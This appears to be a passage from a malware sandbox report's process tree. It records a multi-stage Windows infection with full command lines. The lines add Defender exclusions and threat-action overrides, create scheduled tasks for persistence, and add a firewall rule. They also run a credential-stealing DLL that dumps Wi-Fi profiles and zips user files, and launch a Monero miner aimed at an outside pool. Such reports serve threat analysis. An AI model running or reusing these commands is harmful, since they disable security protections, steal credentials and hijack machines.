PID:992 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:3904
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:3588
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
PID:3152 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:1656
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exe\" it /DLCdidcarz 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:3184
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:3204
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:2536
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:2448
-
-
-
-
-
-
C:\Users\Admin\Pictures\VRViOw5Z4pZPpRviZDGjjPxs.exe"C:\Users\Admin\Pictures\VRViOw5Z4pZPpRviZDGjjPxs.exe"7⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\7zS50FD.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S8⤵PID:2696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:3320
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:4028
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:448
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:1120
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:3252
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:3624
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:4000
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:3192
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:1456
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:3792
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:4084
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:3680
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:3968
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:3008
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:448
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
PID:4028 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:2792
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:3272
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:3452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
PID:3368 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:3668
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exe\" it /hkKdidLTBl 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:3500
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:788
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:2548
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:3764
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2088 -s 6766⤵
- Loads dropped DLL
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"5⤵
- Executes dropped EXE
PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"5⤵
- Executes dropped EXE
PID:2100 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1166⤵
- Loads dropped DLL
- Program crash
PID:2400
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main5⤵
- Loads dropped DLL
PID:3248 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3268 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\297530677122_Desktop.zip' -CompressionLevel Optimal7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "6⤵
- Loads dropped DLL
PID:3208 -
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient7⤵
- Launches sc.exe
PID:3588
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm7⤵
- Executes dropped EXE
PID:3544
-
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink7⤵
- Launches sc.exe
PID:3528
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm7⤵
- Executes dropped EXE
PID:1600
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"7⤵
- Executes dropped EXE
PID:3700
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink7⤵
- Executes dropped EXE
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "6⤵PID:3580
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC7⤵
- Launches sc.exe
PID:1812
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm7⤵PID:3964
-
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink7⤵
- Launches sc.exe
PID:4032
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm7⤵PID:2136
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"7⤵PID:4072
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink7⤵PID:3092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "6⤵PID:3940
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks7⤵
- Launches sc.exe
PID:4036
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm7⤵PID:3264
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"7⤵PID:3192
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks7⤵PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "6⤵PID:3268
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"5⤵
- Executes dropped EXE
PID:3908 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F6⤵
- Creates scheduled task(s)
PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"6⤵
- Executes dropped EXE
PID:3664 -
C:\Users\Admin\AppData\Local\Temp\u2ts.0.exe"C:\Users\Admin\AppData\Local\Temp\u2ts.0.exe"7⤵PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\u2ts.1.exe"C:\Users\Admin\AppData\Local\Temp\u2ts.1.exe"7⤵PID:3200
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"6⤵
- Executes dropped EXE
PID:3272
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"6⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"7⤵PID:3180
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"8⤵PID:3600
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes9⤵
- Modifies Windows Firewall
PID:3000
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main5⤵PID:3744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000020001\f445e8fddd.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\f445e8fddd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1948
-
-
C:\Users\Admin\1000021002\bcaa5b1d77.exe"C:\Users\Admin\1000021002\bcaa5b1d77.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2572 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2468 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4799758,0x7fef4799768,0x7fef47997785⤵PID:2480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:25⤵PID:2824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:85⤵PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:85⤵PID:1532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:15⤵PID:2808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:15⤵PID:1712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1476 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:25⤵PID:1788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2504 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:15⤵PID:2596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:85⤵PID:1560
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:696
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3736 -
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3472 -
C:\Windows\Temp\449643.exe"C:\Windows\Temp\449643.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3916
-
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵PID:1300
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:1368
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {819FC41A-E072-4249-94F1-58082A5ED5F6} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe2⤵PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
PID:1652 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1972
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
PID:996 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2388
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe2⤵PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
PID:268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:944
-
-
-
C:\Users\Admin\AppData\Roaming\jiegbfgC:\Users\Admin\AppData\Roaming\jiegbfg2⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe2⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe2⤵PID:2624
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12751884-244759756313823776060321702022276224-15188894601678670200802451047"1⤵PID:3916
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵PID:1476
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵PID:3160
-
C:\Windows\Temp\673045.exe"C:\Windows\Temp\673045.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x3⤵PID:3652
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240505224807.log C:\Windows\Logs\CBS\CbsPersist_20240505224807.cab1⤵PID:4036
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4950.bat" "1⤵PID:3848
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:4028
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6AC5.bat" "1⤵PID:3336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:2392
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5C9DA46C-C82B-4A7B-9CE4-7F71EEF0A589} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exeC:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exe it /DLCdidcarz 385118 /S2⤵PID:2840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1960
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:3816
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3124
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:916
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2932
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1784
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2892
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1448
-
-
-
-
